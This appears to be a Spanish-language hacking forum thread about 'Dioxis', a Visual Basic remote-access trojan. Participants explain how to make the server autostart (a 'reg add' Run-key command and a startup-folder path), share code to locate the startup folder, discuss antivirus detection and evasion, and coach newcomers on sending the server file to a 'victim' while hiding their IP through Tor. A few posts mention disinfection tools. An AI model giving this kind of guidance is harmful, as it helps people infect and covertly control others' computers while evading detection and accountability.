muchas gracias hacker_zero, la verdad que tus definiciones estan muy bien

yo creo que tambien me definiria como 1, ya que el csocketmaster aun no se como funciona, luego le he hecho unas modificaciones aun asi, de los errores, les he cambiado los codigos y los he definidio mejor, y mi codigo le comprendo perfectamente hasta la ultima esquina

no es por definirme, no me gusta definirme, nunca lo he hecho, pero porque no?  :-\

muy bueno tu troyano :P espero poder hacer el mio :( en c#


 ;-)

Tampoco es necesario como dijeron arriva andar reiventando la polvora, hay muchas clases bien programadas y libres que se pueden usar para cosas especificas, no digo hacer todo un programa basado en codigo ajeno pero para algunas cosas que pueden no ser necesarias aprender a fondo como para crearlas desde cero, o como el caso de 5ol3r que no tiene los conocimientos necesarios para crear su propia clase, no le veo el sentido de crear una clase que probablemente ni se acerque a la calidad a en este caso CSocketMaster, aparte de que no esta programando para una empresa ni es un sofware profesional como para exigirse tanto y estar 1 año para programar un troyano. Lo bueno seria que poco a poco vaya aprendiendo en su totalidad sobre lo que quiera programar y que vaya creando sus clases.
Byes.

ante tal respuesta me asombro, pienso y te respondo.

soy autodidacta, no estudio ingenieria "pero voy camino de ello a mis 18 takos" no me considero superdotado, pero se q tengo cabeza.
la programacion es tremendamente logica, y esa logica aplicandole unas cojonudas ganas d aprender, porsupuestisimo q lleges hacer un troyano no en un mes, en un dia.

si te gustaron los tipicos problemas de mates de la ESO : "pepito tiene 6$ y alvaro 4,5$ y juan la mitad de lo q tiene pepito y alvaro, y si la madre le juan le da el doble de lo q tiene pepito y juan, cuanto tendra el juanete xDD?"

es decir la programacion se basa en la sustitucion de variables.
estudiarse de pe a pa un libro entero de culquier lenguaje, te sirve de -0 si no lo entiendes.

la palabra algoritmo suena muy "espectacular" a los oidos de muchos, pero un algoritmo empieza por la suma de 2 variables, solucionar un problema basandote en lo q te exponen.

asta ir a algoritmos como el RC4... q si os lo mirais en la wiki, os dira q es una sucesion de numeros pseudoaletorios, es decir la entrada a ese algoritmo se hace mediante la contraseña q metas al configurar la red wifi y de hay q los paquetes se encripten con tu contraseña y al snifarlos no puedas leerlos. pero tiene su agujero... no voy a maxacar con esto, es algo extenso y x aki e visto buenos aportes sobre el protocolo 802.11, donde lo explica realmente bien.

o mucho mas comun.. el algoritmo MP3, q se basa entre otras cosas en eliminar frecuencias q el oido humano no aprecia.. de esa manera tenemos la misma calidad de sonido con menos peso..

claro q te comprendo, al ver gente del foro, q por usar un troyano ya exo y enviarselo a un colega, te venga de q hacker noseke y nosekuantos.. enfin...

o al reves crear tu troyanito en el tiempo q sea y q te vengan con q haces ctrl +c / ctrc + v

siempre lo digo "no hay peor cosa que la ignoracia de un mediocre".

x cierto 50l3r tu aplicacion es jugosa.. aunq no la e probao, x q repito no me gusta usar herramientas de otros.. pero si aprender de ellas, me basta con la demostracion, la interfaz es realmente buena, buen trabajo.

mi intencion con esto  es  q  la gente q a leido tu post y se alla podido desmoralizar, hacerle ver q en esta vida no hace falta ser inteligente, listo, ingeniero,tener 1000 posts, autordidacta o lo quieras, "tienes una ilusion, SI, pues adelante", asi se consigen las cosas, con esfuerzo.

"no te preocupes, ocupate!"

hackear = investigar != crackear = destruir

.

decrypt no es desmoralizar, es una verdad como un templo, ni en un dia ni en dos meses puedes llegar a programar un troyano. Totalmente imposible, esque seguir un tutorial que te dice..para especificar el puerto winsock1.remoteport, para.... eso no es aprender. Porque luego cojeras ese codigo y lo pondrás en el programa.

Yo antes de que me enseñaran a programar por ejemplo, estuve unos meses estudiando tipo de datos, longitudes, representación en lenguajes, posibles errores en el manejo de tipos de variables... Apuesto a que eso nadie nunca se ha preocupado, por eso luego vienen aqui algunos preguntando porque declarando un integer se les desborda el bufer, porque no tienen ni idea.

Bueno si hay gente que cree que un troyano lo puede hacer en unos pocos meses, o cree saber programar habiendo leido cuatro tutoriales no les quitaré la ilusión  ;)

bien es cierto q una cosa es qerer aprender y estar x el camino y otra muy diferente es copiar el codigo y joder pc`s xai.. eso como dije es de ignorantes.

leyendote 4 tutos no desarrollas paginas 'dinamicas','rapidas','eficazes'.

esta claro que :

header("location: /?type=$n");

print "$_GET['type']";

no es saber como funcion el metodo get, es saber aplicarlo saber usarlo vamos...

y si, en unos dias aprendes hacerlo sin copiar codigo, otra cosa es saber q representa cada tipo, lo de los tipos de datos q comentabas.

pero ni a un cuarto del foro le interesa eso y quiere hacer o usar troyanos...

 ;D Esto ya parece Laura en America  :P

Yo mas bien diría "amo a Laura"

Perfecto! lo he probado con un pc de otra red y funciona a la perfección! con el nod actualizado y activo jeje

Una pregunta, cuando le cambio el nombre del host a la victima no lo realiza porque lo probe con un amigo y no se lo cambiaba (tenia el windows xp evolution, el resto si funciona todo..

El unico inconveniente que veo es que al reiniciar su pc la victima, el server no se autoejecuta al inicio de windows y hasta que la victima no vuelva a abrir el server no nos aparece en nuestro cliente... ¿Hay alguna forma de hacerlo?? Disculpadme pero no soy muy entendido en estos temas jeje

Gracias por todo!!

debes añadir al registro de windows una entrada, para que cada vez que inicie la pc se autoejecute.

reg add hkcu\software\microsoft\windows\currentversion\run /v ARCHIVO /t reg_sz /d %windir%\system32\ARCHIVO.exe /f

Si mal no recuerdo no se agregaba al inicio con un acceso directo en el menú inicio de win? y lo de la llave era porque lo detectaba el KAV por heurística?  :-\

Saludos

se agrega al menu de inicio, que ironia verdad?  :)

el nombre de host no se cambia hasta que se reinicia la pc jeje

Eso deberías de manejarlo de otra manera, porque no he mirado muy detenidamente el código, pero por lo que veo le cambias el nombre a la pc (corrigeme si me equivoco), y si alguien mira canta bastante (por más que muchas de las funciones en si lo hagan), deberías de crear un registro de "alias" en local que se lleve con el cliente, de este modo el cliente mantiene su nombre, y tu lo tienes identificado como gustes.

Una opción más sencilla y quizás "mejor" (en el sentido de que el registro queda en la otra pc), es que en los accesos directos puedes poner comentarios, así que si tomas el mismo acceso directo que agregas en el inicio y lo "marcas" con un comentario, podrás tener identificada a la pc, .. eso o utilizar incluso algún archivo más  :P

Saludos

el troyano tiene tambien soporte para nicks, lo de cambiar el nombre de host va por otro lado

Dices que se agrega al menu de inicio, pero yo me refiero al inicio automatico de windows, que no lo hace y si no lo hace una vez reinicie no podre volver a conectar con la victima no? Corrigeme si me equivoco

Con menú de inicio me refiero a carpeta de incio

http://foro.elhacker.net/tutoriales_documentacion/manual_de_procesos_que_se_ejecutan_al_inicio_de_windows_xp-t146876.0.html

Saludos

De las pc en que lo he provado , en todas se autoejecuta al iniciar windows ! :D , de otra manera seria un terrible bajon jaja !!   :-\

Pues no cuando la victima reinicial a pc no me hace la llamada el cliente, si es cierto que se en los procesos activos esta el ekr... pero como puedo acceder a el? me tiene que hacer la peticion como la primera vez que lo ejecutó?? o tengo que acceder yo a el de otra forma? porque el dioxis lo tengo abierto y cuando reinicia no me notifica su conexion..

.....

haber derypt, no lo entiendes

el troyano se inicia al ejecutar windows, no ves que esta diciendo que el proceso le aparece

puede ser debido a algun firewall por ejemplo, o que el puerto especificado no sea el mismo, o inluso qu ni hayas puesto a escuchar, lo digo porque cada vez me agrega mas gente diciendome que le diga todos los pasos porque no tienen ni idea


ademas no hara falta cambiar el codigo ya que desde la shell del troyano lo podria hacer, y seria mas indetectable, aun asi, el troyano ya se ejecuta, no solo lo que esta en el registro se ejecuta

lo de añadirlo desde la shell remota es verdad seria mejor, ya pesa bastante el server como pa añadir mas codigo.

y me reitero lei mal la pregunta.

por q quieren usar  troyanos sin saber si quiera como funciona windows,un router,o el proto tcp.. ya ni hablo de programar..

Hay gente que por curiosidad y hay mucha otra gente que para poder decirle a sus amiguetes que son grandes juankers, pero esa discusión está mas que hablada y no se llega a ningún lado.

es un bucle de discusiones que no llegan a ningun lado, lo unico a lo que se puede llegar es a llamarse entre todos lammers, unicamente, y quedar mal con todos o casi todos

el mayor enemigo del hacking es el orgullo  :-\

estoy asta el nabo, todo esto es absurdo, te obzecas y te vuelves a obcecar...
enfin esta bueno lo del bucle infinito que no llega a nada, 100%!!

que hagan lo que quieran... total lo unico que se hace es perder  el tiempo.
quieres ir de wuake con los colegas 'bien', quieres aprender 'mejor', curiosidad? 'perfecto'.

Hey S0l3r verifike tus codigos y esta bastante bueno y Felicitaciones x tu nuevo aporte.
Con respecto, al programa en si trate de ejecutar el cliente pero uhm... me sale que no es una applicacion de win 32 valido.(not a win32 valid application). a que se puede deber esto..

tienes antivirus, quitalo jeje

ops creo haber encontrado el problema, posiblemente sea xq estoy usando una PC Con un sistema operativo de 64 bits......... :P

Eexacto, te toca recompilarlo :P

waa es mucho rollo broer estoy en un SO de 64 x lo q no me deja instalar VB.6 y como ultimo recurso estoy aprendiendo con VB. net q es una joda total en cuanto al uso de sockets.. :-\

 :o ... los sockets en .NET son una pasada, no veo cual es el problema .. podrías crearte tu propio cliente .. el server ya esta  :P

Saludos

Si pero es todo un rolllo de crear otro para tu cliente y una extra para tu servidor, a diferencia del Vb6 q esta ya todo servido  :) pero de todas forma comenzare esta noche como para practikar ;-)

Muy buenas a todos! soy nuevo por aqui. He estado intentando ver la carpeta donde se aloja el archivo en el codigo fuente pero no lo consigo en parte porque no puedo agregar el proyecto del servidor a Visual Basic Express.
Tambien me gustaría que me recomendarais algun manual de Visual puesto que se bastante de Java y me gustaría aprender un nuevo lenguaje.

De java a Visual... que depresion :¬¬ :¬¬ :¬¬ es una broma, cierto :huh: :huh: :huh:

Y que tiene de malo pasar de Java  a Visual Basic para mi excelente ya que si uno sabe programar en C++ o cualquier lenguaje ya tiene la base para programar lo que sea y ademas a todo eso se añade que lo puedo hacer lo que cuenta es el interes en lo personal se c++, Java,Phyton,Visual Basic, .Net, Assembler y mas pero lo que se es usado en cualquier lenguaje

ningun lenguaje es identico al otro, puedes tener la base pero por que sepas c++ nunca sabras programar en otro lenguaje si estas familiarizado con el y nunca lo viste, pero no desvirtuemos jeje  ;D

No entiendo nada?? que pasa x kerer aprender un nuevo lenguaje de programación? sinmas... simplemente keria saber donde se guarda el archivo autoejecutable del troyano para probarlo en mi ordenador y despues poderlo desinfectar manualmente pero bueno ya veo que la gente no esta muy por la labor... de todas formas me podeis recomendar un manual de Visual

no hagas caso a R.N.A  :P

un buen manual que te recomiendo para vb es este:

abcdatos.com/tutoriales/tutorial/l2524.html

es el de aprenda vb como si estuviera en primero, con ese empece yo

pd: tambien tienes el de practique vb como si estuviera en primero, yo imprimi los dos y es una tochada pero viene todo bien explicado y demas

ok muchas gracias  ;-) !!!

Otra cosa respecto a lode donde se guarda el fichero que se ejecuta al reiniciar el ordenador no me lo vas a decir no?? jjjajaja haber yo esque simplemente quiero infectar mi propio ordenador...lo que pasa esque luego se va a quedar un proceso x ahi abierto y nom hace mucha gracia... nose sime expliko.De todas formas muchas gracias por el manual!  :D

En mi PC es

 %userprofile%\Microsoft\Windows\Start Menu\Programs\Startup\ekrn32.exe

datax44 no hagas doble post, edita el ultimo para la siguiente vez, asi estara el foro mas ordenado

el ejecutable se copia en el path de inicio de su s.o correspondiente

ok eso es lok yo queria.Muchas gracias a los dos otra vez...La verdad esque con esto del troyano ma picao el gusanillo por el VB.He trabajado con los sockets de Java pero creo que son menos potentes que los de VB o esque yo no los sabia aprovechar bien...jejej asique andare por el foro ym leere bien los manuales que me has pasado 5oler.Un saludo! :D

de nada, acuerdate de lo del doble post, este foro es muy tikismikis en cuanto al orden jeje, cosa que esta bien

pues la verdad nunca programe en java jeje, no se como estaran en java

saludos

pd:115 respuestas en este post :O

 :xD

http://foro.elhacker.net/seguridad/ayuda_desinfectar_dioxis-t272181.0.html;msg1335917#msg1335917

jaja que buena, ya me encontre posts parecidos a esos, siento no haberlo visto antes y no haberle podido responder

http://foro.elhacker.net/seguridad/ayuda_desinfectar_dioxis-t272181.0.html;msg1336193#msg1336193

Hice una vacuna para desinfectarse ;)

YST deberias añadirle que borre la clave del registro, así la vacuna queda mas completa  ;)

¿Cual? :xD

Si te refieres a la de autoinicio , no se escribe en el registro para autoiniciarse ;)

Me refiero a esto:

 %userprofile%\Microsoft\Windows\Start Menu\Programs\Startup\ekrn32.exe

Sigo sin entender , yo andare tonto no lo se :S Pero no te entiendo , ese exe es eliminado con

del "%userprofile%\Microsoft\Windows\Start Menu\Programs\Startup\ekrn32.exe"
 

Nada nada, que pensava que habia escrito una cosa y solo había puesto eso...No me habia mirado el código fuente y no sabia si iba por startup o por registro.

Ahora que lo veo me surge una duda ... como es que eso funciona? digo ... esas carpetas son para un win en inglés, pero si el win esta en español? será por eso que a algunos les falla?  :rolleyes:

Hay maneras de obtener esa ruta sin "inventarsela"  :rolleyes:

Pues haber, si solo está en ingles deberia fallar.El programa debería mirar antes el idioma del sistema que va a infectar...Algúna vez se me ha creado esa ruta con algún programa que he utilizado, y no se si es porque la crea previamente o al copiarse el ejecutable se crea todo, aunque creo que lo creava previamente, ya que si hacemos la prueba de crear/copiar un archivo en un directorio inexistente vb lanza un mensaje de error.

Claro que si se usa un "on error resume next" el programa se ejecutará sin dar mensaje de error...eso si la próxima vex que conecte reinicie el usuario infectado el pc éste no se iniciará.

no hace falta con la api de getfilepath, creo que se llama, se consigue, pero no la implemente, lo hare para cuando saque la siguiente version

Claro skapunky, es que no había prestado anteción a eso, había revisado el código fuente para responder al otro usuario en el foro de seguridad y si bien había visto la ruta no me había puesto a pensar eso XD
Esa carpeta la obtienes fácilmente con FSO, y te evitas verificar lo del idioma :P


No miré muy detenidamente el code, pero entonces es así? solo serviría en windows en inglés?

Saludos

cree los directorios basandome en mis sistemas operativos, estos estan en español pero nose si dara algun problema

Apostaría que tu win esta en inglés y viene con el MUI, es decir, los menú y demás están en español, pero los directorios "reales" están en inglés  :P

Saludos

  :D Esto pica y se extiende el hilo deberia llamarce "Destripando el Dioxis" XD  :)

 Tal vez si husmean mas encuentren la IP de Soler o su numero Telefonico  :laugh: ...


  Saludos....

jaja, eso con ser mod la ip ya vale no? xD

el dioxis es un troyano que no he reparado en ocultarlo y demas, le he puesto mas incapie en las cosas que lleva

y puede que los dreictorios esten en ingles y demas ya uqe es un win 7 7600 ultimate

voy a ponerme a instalar un mac en mi laptop :D

Entonces he acertado a medias ya que pensé que era un XP, entonces más sencillo, así viene el win 7, lo tengo igual  :P

Tener en cuenta para quién lo usa en un SO con los directorios en español

Saludos

Private Declare Function SHGetSpecialFolderLocation Lib "SHELL32" (ByVal hwndOwner As Long, ByVal nFolder As Long, PIDL As Long) As Long
Private Declare Function SHGetPathFromIDListA Lib "SHELL32" (ByVal PIDL As Long, ByVal pszPath As String) As Long
 
Public Function GetStartupFolder() As String
    Dim PIDL        As Long
    Dim sPath       As String * 260
 
    If (SHGetSpecialFolderLocation(0, &H18, PIDL) = 0) And (PIDL <> 0) Then
        If SHGetPathFromIDListA(PIDL, sPath) Then
            GetStartupFolder = Left$(sPath, InStr(sPath, Chr$(0)) - 1)
        End If
    End If
End Function

MsgBox GetStartupFolder

Bonito código ese Karcrack, yo suelo usar SHGetSpecialFolderLocation (http://msdn.microsoft.com/en-us/library/bb762203%28VS.85%29.aspx) en lugar de GetWindowsDirectory o GetSystemDirectory que suelen ser bastante detectadas. Apuntatelo 50l3r   :).

Saludos

ya me lo dijo karcrack hace un tiempo

PREGUNTA TONTA???
FUNCIONA EN windwos S7ven
(Perdon me pase con esa pregunta jajajaja )

Me respondo no por que no maneja los mismos registros

Pd: No se si estoy quivocado

Si funciona en WIN7 ;)

A upsssss ok tonces no fue tan tonta???? y una consulta mas YST lo q es Seven tiene el mismo juego de registros??? de xp  :-\

algunos cambian, pero casi todo es igual

Hola soy nuevo, i no puedo instalar el dioxis 5.0 lite me lo he bajado le doy al ejecutable i me pone error '339'
alguien sabe lo que es, utilizo wvista

gracias

necesitas la libreria comdlxg32.ocx

se llama comdlg32.ocx , y deberias usar la api asi te ahorras el ocx.

hace falta tener instaldo el vb6? que es la api

Bajate la comdlg32.ocx solamente ;)

no puedo instalarlo :-(

porque no? te tira error , como lo estas registrando? tenes permisos?

voy a ejectar i pongo regsvr32 C:\windows\system32\COMDLG32.OCX i me sale: se produjo un error en la llamada DLLregisterseerver (codigo de error: 0x8002801c)

 :-(

unicamente hay que colocarlo en system32 que yo crea


no me se el nombre de memoria

no se, yo lo pongo en el system 32 i no anda el dioxis

dice microsoft:

This error means that regsvr32 was not able to access and/or update the registry. Check the permissions on the part of the registry where access is denied. You can run regmon to manually fix the registry.

como dije fijate si tenes permisos de admin para registrar, sino busca como hacerlo, en google esta.

quita el uac de windows vista, es muy pesado, quizas sea por eso

No S0l3r funca normal en vista con el uac hice la prueba no debe tener los permisos suficientes

Muchas gracias a todos ya lo he podido instalar  ;-)
ahora esta la segunda parte, que archivo le tengo que enviar a la victima para infectarla i la victima puede saber mi ip

 :silbar:  El Server.... y si puede saber tu IP  :P a no ser que utilices Tor  ::)

pero le envio el exe del server no?
gracias

hombre claro, luego el lo ejecuta y te pones a escuchar por el puerto que especificaste

eso si, si tienes router abre puetos, que siempre se olvida


porcierto, por l oque he visto en un analisis hace poco, de av famosos lo detectan avast y avira nada mas :/

Nooo, enviale el cliente y ejecuta el server...

Claro que tiene que ser el server lo que vas a enviar a menos que quieras ser quien se infecte y el otro user quien te manipule

ok gracias
y eso del tor no me queda muy claro si alguien me ayuda  ;D
gracias

el tor sirve para ocultar tu ip en caso de que te traben


deja de poner pegas, nadie nace sabiendo

Tor es un programa que une varios proxys anonimos teniendo la posibilidad, que con firefox, mas un plugin, puedas navegar anónimamente, ya que no tendrias tu real ip.

i vosotros lo teneis puesto ?

yo si, por ahora no lo uso mucho pero es muy bueno, basta con un dobleclick en una parte de la ventana de firefox y ya tenes una nueva "identidad".

ok, pero eso como me puede proteger si le envio un troyano? :rolleyes:

si la victima sabe  algo minimo de pc, buscara tu ip,contactara a tu isp y te podria llegar a denunciar y es un re quilombo, es raro que te  pase esto, pero por si acaso.

pero como se utiliza el tor para que la victimaa no sepa mi ip

te lo descargas de la pagina oficial, lo instalas, te instala creo el privoxy, tor yotro mas. tambien te va a instalar un plugin en firefox, el Tor Button, es fundamental. reinicia la pc y vas a ver que en firefox abajo de todoa a la derecha (de todo xD!) va a decir :
Tor deshabilitado

haces un click y esperas a que diga
Tor habilitado


ahi abris una nueva pestaña y ya estas navegando anonimamente, cada vez que cambies el estado de tor abri una nueva pestaña. te aviso que como cualquier proxy va a ir lento, perote acostumbras..



ah y una cosita, esto no sirve para los programas xD! es para firefox y chau.
pero como usas el dioxys? por firefox :P!?

por eso, si le envio el server a la victima podra saber mi ip o no pejm:si lo paso con un cd

El tor si no mal recuerdo no es solo del protocolo HTTP =P



;)

mira vos no lo habia leido eso. habria que ver como se configura el puerto de dioxis para que use tor, osea si pongo 80 (http) no me lo ari asi como si nada.

tor tambien es compatible fuera de pagina web

el bifrost, como podeis ver tiene la posibilidad de usarlo


simplemente puedes usar programas que conecten proxys entre si para "Ocultarte", como sockschain aunque este es muy viejo, u otros que no conozco

yo para navegar "anonimamente" uso un proxy configurado desde firefox que sea ultraanonimo y luego me conecto con este a un webproxy, asi tendras dos ya ;) y mas o menos te sirve

pd: siempre te acaban cogiendo, uses proxys o no ya que la mayoria de las empresas de proxy ceden la informacion en caso de algo grave, pero siempre de como sea la gravedad de la situacion

Tienes que habilitar el puerto en el fichero torrc el puerto virtual que es el que utilizara tu server  y abrira la red proxy y el real que es donde recibiras las conexiones tienes que tener un buen ancho de banda  :-\ ya que la velocidad se reduce bastante


  Tor no es una empresa privada es un proyecto publico como freenet y es la red proxy legal mas segura  :) no digo que sea imposible pero para que alguien se tome la molestia de rastrearte por tor ha de ser muy pero muy grave lo que se hace En teoria es posible rastrear pero en la practica no he sabido de ningun caso de alguien que alla caido con tor a no ser que Cardeo von los controles Active X Activo  :P .....

A ver si alguien me puede ayudar porque esto escapa de mi comprensión:

He probado bastantes troyanos y con ninguno consigo "escucharme" a mi mismo. En el caso del Dioxis Pongo mi IP actual (por si el no-ip no funcionase, aunque se que funciona y tambien lo he probado con él) Pongo el puerto (en este caso el 2000) y sí si lo he abierto llevo mucho tiempo abriendo puertos ya sea para unas cosas u otras y Sí otra vez, tengo desactivado el FW de windows.

Uso el Avast! y para hacer toda la prueba detengo la proteccion por acceso.

Más datos que pueda dar... uso ip estática y uso Vista y nada de nada no consigo infectarme a mi mismo, asique supongo que el probea está en la IP y el puerto pero esque está abierto el puerto y la IP se seguro que es esa... a ver si alguien lo entiende...

si no tienes enrutador, no puedes conectarte a dioxis tu mismo ya que el modulo csocketmaster que usa no comprende localhost, al menos yo lo intente y no, tuve que hacerlo con mi ip privada

Puedes usar gethostbyname() de winsock para resolver direcciones...
La funcion se le pasa un puntero a la cadena de la direccion (localhost) y te devuelve un puntero a una estructura hostent




 el primer miembro (h_name) apunta a una lista, la cual el primer elemento es la ip (en caso de localhost por supuesto te devolvera 127.0.0.1)


Saludos

Ah, de acuerdo muchas gracias.


Lo he pasado por el novirusthanks y ya es detectado por bastantes AV. Veo que hay mucha gente que ha retocado y versión. Sabeis alguno de vosotros alguna version que no sea tan detectado? O algun tutorial actualizado sobre cómo indetectarlos que yo (que no se programar) pueda entenderlo? >.<

Estoy intentando meterme en el mundillo y poco a poco voy entendiendo las cosas pero no me puedo creer que no haya versiones de troyanos actualizasas y modificadas por gente que de verdad sabe (como soler).

Gracias por toda la ayuda que me podais prestar.

pues si sabes vb puedes editar los strings, asi sera menos detectado, eso si luego tendras que montarlo  :D

No, no se vb (supongo que sera VisualBasics) ni editar strings ni montarlo xD

Por eso digo de alguie nque ya lo haya modificado y que no le importe compartirlo

al intentar descarga el archivo, el avast lo detecta como troyano... q hago lo instalo igual???

si me autoinfecto me pasara  algo? despues podre borrarlo?
gracias

el archivo esta limpio, el avast n ote dejara meintras lo tengas activado

no me pasara nada no?

no tranquilo, el av avisa porque es un hack tool nada mas  :P

no se como empezar a escribir pero lo hare de forma breve, te infectaras obviamente y si 50l3r te da la solucion entonces podras desinfectarte :S

la pregunta es si esta hablando de cliente o server, porque yo me refiero al cliente

aun asi el server es muy facil de desinfectar, el troyano no esta pensado para esconderse

entonces con eliminarlo bastaria no?:s

Si , en el subforo de seguridad existen herramientas para desinfectarte del dioxis :P

Esta es una herramienta de mi autoria que elimina totalmente el Dioxys 5.0

Hubiera sido mejor un .vbs :P

+

xD decidi hacerla en una ventana para ponerle la imagen

ola soy nuevo y me e quedao :o asi xD de la info q hay por aki

1º gracias a todos por esta info

2º tengo el vista y no me deja abrirlo me sale

"Windows no tiene acceso al dispositivo, ruta de acceso o archivo espedificado. Puede que no tenga los permisos para tener acceso a este archivo"

No se lo que hacer, primero me salto el avast lo desactive y me descarge el archivo, me encantaria iniciarme con este program pero no puedo utilizarlo.

Gracias de antemano

Reporte al Dia 19/12/2009 0631 pm

a-squared   4.5.0.43   2009.12.19   Trojan-Spy!IK
AhnLab-V3   5.0.0.2   2009.12.19   -
AntiVir   7.9.1.114   2009.12.18   TR/Spy.Gen
Antiy-AVL   2.0.3.7   2009.12.18   -
Authentium   5.2.0.5   2009.12.02   -
Avast   4.8.1351.0   2009.12.19   -
AVG   8.5.0.427   2009.12.19   -
BitDefender   7.2   2009.12.20   -
CAT-QuickHeal   10.00   2009.12.19   -
ClamAV   0.94.1   2009.12.19   -
Comodo   3302   2009.12.20   -
DrWeb   5.0.0.12182   2009.12.19   -
eSafe   7.0.17.0   2009.12.16   -
eTrust-Vet   35.1.7185   2009.12.19   -
F-Prot   4.5.1.85   2009.12.19   -
F-Secure   9.0.15370.0   2009.12.19   -
Fortinet   4.0.14.0   2009.12.19   -
GData   19   2009.12.20   -
Ikarus   T3.1.1.79.0   2009.12.19   Trojan-Spy
Jiangmin   13.0.900   2009.12.19   -
K7AntiVirus   7.10.923   2009.12.17   -
Kaspersky   7.0.0.125   2009.12.20   -
McAfee   5837   2009.12.19   -
McAfee+Artemis   5837   2009.12.19   -
McAfee-GW-Edition   6.8.5   2009.12.20   Trojan.Spy.Gen
Microsoft   1.5302   2009.12.19   -
NOD32   4702   2009.12.19   -
Norman   6.04.03   2009.12.19   -
nProtect   2009.1.8.0   2009.12.18   -
Panda   10.0.2.2   2009.12.15   -
PCTools   7.0.3.5   2009.12.20   -
Prevx   3.0   2009.12.20   -
Rising   22.26.05.04   2009.12.19   -
Sophos   4.49.0   2009.12.20   -
Sunbelt   3.2.1858.2   2009.12.19   -
Symantec   1.4.4.12   2009.12.20   -
TheHacker   6.5.0.2.100   2009.12.20   -
TrendMicro   9.100.0.1001   2009.12.19   -
VBA32   3.12.12.0   2009.12.19   -
ViRobot   2009.12.18.2097   2009.12.18   -
VirusBuster   5.0.21.0   2009.12.19   -

gracias por aportar blackzero

es BlackZeroX con la X ¬¬"

esque es una x en forma de estrella  :P

la verdad me sorprende que con tanto tiempo sacado a la luz lo detecten tan pocos

Es que ya se han de estar hartado xP (han de estar jugando Halo, jojojo tipo The Big-Bang Theory)

na no me la creo ni yo xP

Dulces Lunas!¡

pretendo sacar una nueva version, pero me he quedado atascado en eso de la multiconexion y transferencia de archivos, lo he intentado hacer varias veces pero me quedo atascado jaja

trata con las Apis que se encuentran en wininet.dll

tengo una duda aver si me pueden responder io no ee descargado este troyano pero se ve interensante pero en fin al grano en el taskmgr (donde aparecen todos los procesos del sistema perdonen mi ignorancia ) aparece este proceso ekrn.exe eso kiere decir k estoi infectado por este troyano o debe ser el proceso ekrn32.exe ayundeme ia me dio miedo xDD

El autor especifica en la pagina#3 de este tema que el proceso se llama ekrn32.exe por lo tanto a menos que alguien lo haya modificado y te haya infectado no se llamara ekrn.exe

como te dice r.n.a el proceso es ekrn32.exe

el otro proceso puede ser alguno del sistema, o si no tienes suerte, otro malware :S

Por cierto, 50l3r participaras en Abril Negro?

no lo se, estoy muy liado con pixelados, luego estoy realizando un curso de php para obtener un titulo, tengo que acabar el grado medio que estoy haciendo, y presentarme a los examenes de prueba para el superior y estoy con el programa clip manage que maneja el clipboard

vere si puedo hacer algo

:xD eso parece un no

seguramente hare una version del dioxis, que contenga mas opciones, un poco malvadillas, mas que nada de edicion del registro, cambiar la forma de iniciarse...etc

pero con la version 6, nose si llegare a sacarla, porque lo de la multiconex y transferencia, no quiere salir

  Pues yo no se si publicar el bot con el source que termine para abril negro ,o publicar solo los binarios donde se pueda, o venderlo  >:D o propagarlo y usarlo XD  >:D

  Despues de matar el tigre le tengo miedo al cuero  :-[ ...

:xD publica el source y caso cerrado

alucinante!!!!!!!!!!!
buen trabajo

Bueh, he probado a infectar 4 pcs y no escucho a ninguno de ellos.
Puertos abiertos, no-ip running, ,  supongo que en esos 4 pcs los puertos no estan abiertos.

Para comprobar si estan funcionando, miro por el ejecutable que habeis dicho por aqui?

Si no me sale, puede ser porque se hayan infectado con privilegios más que pateticos? Si los infecto as admin colará?

te deberia de dejar conectarte aun con pocos privilegios

comprueba tus firewalls, monitoriza tus conexiones con netstat o un soft especifico

vamos, comprueba que sale a internet

Amigo, me ha encantado tu programa, es sencillo y facil de usar.
Que me recomiendas para aprender a programar?
Gracias!